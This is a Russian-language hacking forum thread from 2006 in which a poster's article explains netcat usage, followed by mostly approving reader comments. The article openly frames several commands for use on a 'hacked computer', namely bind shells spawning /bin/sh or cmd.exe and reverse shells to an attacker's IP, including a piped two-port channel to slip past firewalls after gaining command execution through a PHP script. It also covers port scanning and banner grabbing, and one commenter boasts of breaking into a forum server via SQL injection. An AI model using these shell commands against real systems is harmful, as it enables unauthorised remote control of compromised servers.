Выжимаем все соки из C:\nc\nc.exe

Discussion in 'Статьи' started by Ch3ck, 10 Jun 2006.

  1. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,184
    Reputations:
    430
    Использование NETcAT

    Тут вот решил написать небольшую статью о NetCat(aka "Швейцарский армейский нож протокола TCP"). В основном мы используем эту программу для прослушки порта C:\nc\nc -l -p [port] и для подключения к какому либо серваку. Но не кто не задумывался в более широком применении нетката, и ипользования всех его ключей.
    NetCat представляет собой утилиту, предназначенную принимать и передавать данные TCP и UDP соединений.
    И так, основные возможности nc:
    - входящие и исходящие TCP или UDP соединения на и с любого порта- полная проверка DNS перенаправлений- возможность использовать любой локальный порт - возможность использовать любой локально сконфигурированный сетевой адрес(интерфейс)- встроенная возможность сканирования сетевых адресов- возможность чтения аргументов командной строки через стандартный вход- и т.п.
    Рассмотрим всё подробнее.
    Открываем удаленный доступ к командной строке
    Под unix:nc -l -p 31337 -e /bin/sh
    Под НТ:nc -l -p 31337 -d -e cmd.exe -L
    Разберем опции:-l -- включаем режим "слушания"-p -- здесь, кажется, все ясно: указываем какой порт прослушивать (31337)-d -- позволяет nc запуститься независимо от консоли -e -- указывает nc, что после установления соединения нужно запустить (cmd.exeили /bin/sh)-L -- nc должна перезапускаться с теми же параметрами после разрыва соединения
    Чтобы клиент установил соединение достаточно запустить nc, сославшись на адрессервера и прослушиваемый порт:
    nc IP 31337
    - на взломанном компьютере с адресом 10.10.1.15:
    nc -l -p 31337 -nvv -e /bin/sh &
    - на компьютере хакера:
    nc -nvv 10.10.1.15 31337
    Чтобы выйти из консольной сессии напишите команду exit.
    Работаем с FTP
    Передавать файлы можно при помощи перенаправления вывода.
    На машине, куда передаем файл (с ip адресом IP):
    nc -l -p 1337 >имя_файла
    На машине, с которой передаем файл:
    nc IP 1337 <имя_файла
    Выходим при помощи ^C.

    Сканирование портов
    Вот пример, который давал Hobbit:
    nc -v -w2 -z цель 20-30
    Nc будет пытаться присоединиться к каждому порту в диапазоне от 20 до 30 намашине с адресом "цель" и проинформирует нас о банерах, которые передадут службы ftp, telnet и др., в случае успешного осединения. Флаг -z предотвращает отправкукаких-либо данных по TCP соединению (соответственно скорость сканированияувеличится), режим нулевого ввода-вывода. Параметр -w2 задает интервал ожиданиядля каждого соединения. Для ограничения скорости сканирования можновоспользоваться флагом -i и указать разрыв между пробами портов. Уровень подробности выводимой информации задается при помощи -vили -vv.По умолчанию nc использует TCP соединение. Для задания UDP указываем -u.
    В любом случае, nc - это не сканер. Если ничего нас не ограничивает, лучшевоспользоваться nmap для этого.
    Хотя можно просканировать вот так:
    nc -v -z -w2 222.222.222.222 1-500

    Собираем идентификационные маркеры
    Да, конечно, можно просто зателнетиться на определенный порт и получить минимуминформации. Но давайте посмотрим разницу между получением маркера при помощи telnet и nc.
    $ telnet 10.15.6.40 80HEAD / HTTP/1.0

    HTTP/1.1 200 OKDate: Wed, 15 Oct 2003 09:19:50 GMTServer: Apache/1.3.19 (Win32) PHP/4.3.1Last-Modified: Mon, 01 Apr 2002 07:43:38 GMTETag: "0-4ef-3ca80faa"Accept-Ranges: bytesContent-Length: 1263Connection: closeContent-Type: text/html
    А теперь дело за неткат:$ nc -v 10.15.6.40 80 BEAR [10.15.6.40] 80 (?) openHEAD / HTTP/1.0

    HTTP/1.1 200 OKDate: Wed, 15 Oct 2003 09:23:02 GMTServer: Apache/1.3.19 (Win32) PHP/4.3.1Last-Modified: Mon, 01 Apr 2002 07:43:38 GMTETag: "0-4ef-3ca80faa"Accept-Ranges: bytesContent-Length: 1263Connection: closeContent-Type: text/html
    sent 17, rcvd 255: NOTSOCK
    Возможно уместно будет создать простенький сценарий, который бы вызывал nc снужными параметрами.
    -- begin of marker.sh --#!/bin/shif [ -z $1 ]; thenecho -e "Usage: $0 <host> <port>"exitfiecho -e "HEAD / HTTP/1.0\n\n" | \nc -vv $1 $2-- end of marker.sh --
    Хотя этот сценарий больше подходит для сбора маркеров веб-серверов, подогнатьпод другие цели не составит труда. Например, чтоб получить страницу для анализаможно указать "GET /index.html HTTP/1.0" и выходные данные передать команде grepдля поиска интересующего контента.

    А теперь сделаем обратный коннект...
    Часто бывает нужно обойти ограничения файрвола на удаленном сервере. Представьтесебе, вы получили доступ к выполнению системных команд, скажем, через phpскрипт. Но вы ограничены в действиях, и вам нужен нормальный shell. Запускаембекдор и обнаруживаем, что связи с сервером по порту, который открыл бекдор,все-таки нет. Очень похоже на фильтрацию портов брандмауэром? Что делать? Втаких случаях обычно пытаются установить обратный коннект (обратный канал),когда наш сервер выступает в роли клиента. Скорее всего не будут фильтроватьсяисходящие соединения по портам 80 и 25. Этим мы и воспользуемся. Как это всереализуется при помощи netcat:
    - на машине кулхакера с IP 10.31.3.37:
    nc -l -n -v -p 80
    - на сервере:
    nc -e /bin/sh 10.31.3.37 80
    Сервер создаст обратный канал и, соединившись с нашим компьютером, даст намдоступ к командному интерпретатору.
    Но бывает, что брандмауэр пропускает входящие запросы по одному порту, аисходящие - по другому. В таком случае нужно сделать реверсивный сеанс. пусть,как мы и сказали ранее, это будут порты 25 и 80.
    Запускаем на машине кулхакера 3.1.3.37 два сеанса nc:
    nc -vv -l -p 25nc -vv -l -p 80
    на взломанном сервере:
    nc 3.1.3.37 80 | /bin/sh | nc 3.1.3.37 25
    Что мы увидим на нашем компьютере? На 80-й порт мы принимаем соединение ссервером, передаем команды, которые в свою очередь перенаправляются командномуинтерпретатору, а результат направляется нам на порт 25.
    А вот и основные ключи использования nc
    nc:-d запускает nc не в консольном (скрытом) режиме-e для запуска другой программы
    -i задает временной интервал
    -g используется для саздания протрассированного соединения (после traceroute)-G позиционирует "прыгающий указатель" в списке
    -l переводит nc в режим ожидания входящего соединения
    -L перезапускает nc с теми же параметрами, что и до разрыва соединения
    -n неткат использует только IP адреса и не делает DNS запросов
    -o используется для получения HEX дампа файла данных. использование:
    -o имя_лог_файла.-p требуется для исходящих соединений. параметр, задающий порт, может быть как числом так и именем. если не использовать
    -p, nc будет использоватьлюбой из неиспользуемых портов, которые система выделит (и если не используется опция -r).
    -r сканирование портов будет происходить случайным образом (в нормальном режиме - от большего к меньшему)
    -s указывает какой сетевой адрес использовать ("-s IP" или "-s имя"). в логе входящие и исходящие соединения будут начинаться с символов "<" и ">" соответственно.
    -t позволяет nc отвечать на согласование опций telnet (работает только, если nc скомпилирована с параметром -DTELNET)
    -u указывает, что нужно использовать UDP, а не TCP-v контролирует уровень подробности информации:mad: без параметра
    -n будет производиться полный поиск имен и адресов хоста, будет сообщено о несоответствии имен DNS @ часто требуется использовать
    -w 3, что ограничит время, затрачиваемое на попытку установить соединение@ для нескольких портов требуется использовать -v дважды
    -w ограничивает время, затрачиваемое на попытку установления соединения
    -z предупреждает отправку любых данных по TCP соединению и очень ограничивает зондирование UDP соединений. использование
    -i даст возможность задать интервал между попытками. полезно для задания быстрого сканирования открытых портов.
    Скачать NetCat можно ТУТ
     
    #1 Ch3ck, 10 Jun 2006
    Last edited: 2 Dec 2006
    15 people like this.
  2. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    Я когда то взломал сервер форума с помощью этой программы.
    Вот примерный код (это было с SQL Injection) с которым я взломал сервер :
     
  3. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,184
    Reputations:
    430
    Хоть кто-нить скажите как статья, а то писал хрен знает сколько по веремени, а тут не спасибо, не насрать... :(
    Ведь не для себя же писал....
     
    2 people like this.
  4. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    935
    Likes Received:
    396
    Reputations:
    261
    Статья номральная. Минусы в ней: Жутко называеться сама по себе. Называл ыб лучше опции nc и т.д. А так всё норм.
     
  5. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    Ничтяк. Русский хелп никогда не помешает
     
  6. Mobile

    Mobile Elder - Старейшина

    Joined:
    18 Feb 2006
    Messages:
    1,089
    Likes Received:
    820
    Reputations:
    324
    Властью данной мне админом, объявляю стотью нормальной...
     
  7. shiz

    shiz New Member

    Joined:
    9 Jun 2006
    Messages:
    14
    Likes Received:
    3
    Reputations:
    4
    неплохо и даже вроде хорошо.. очепятки подправить да и совсем хорошо... но эт мелочи)
     
  8. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
  9. Tikson

    Tikson Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    263
    Likes Received:
    42
    Reputations:
    14
    Mobile- никакой власти сейчас у тебя уже нет
    ---------
    статья хорошая!Спасибо!
     
  10. nerezus

    nerezus Banned

    Joined:
    12 Aug 2004
    Messages:
    3,191
    Likes Received:
    729
    Reputations:
    266
    тема прокси не раскрыта.
    незачот )
     
  11. Digimortal

    Digimortal Banned

    Joined:
    22 Aug 2006
    Messages:
    471
    Likes Received:
    248
    Reputations:
    189
    Какое-то двоякое впечатление от прочтения, вроде и неплохо, но чего-то не хватает...
     
  12. [loy]

    [loy] Elder - Старейшина

    Joined:
    24 Mar 2006
    Messages:
    126
    Likes Received:
    23
    Reputations:
    16
    Ниче норма
    А вот еслиб исче и под Линь было харошо
     
  13. r0

    r0 Elder - Старейшина

    Joined:
    17 Jul 2005
    Messages:
    450
    Likes Received:
    149
    Reputations:
    147
    есть версия и под nix =)
     
  14. Odissei

    Odissei New Member

    Joined:
    2 Jan 2006
    Messages:
    4
    Likes Received:
    2
    Reputations:
    0
    обновите или дайте плиз кому не трудно линк на скачку (NetCat'a) nc.exe
    =======
    //спс за линк
     
    #14 Odissei, 6 Nov 2006
    Last edited: 7 Nov 2006
  15. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,184
    Reputations:
    430
    _http://www.web-hack.ru/download/index.php?case=6
    В самом низу страницы...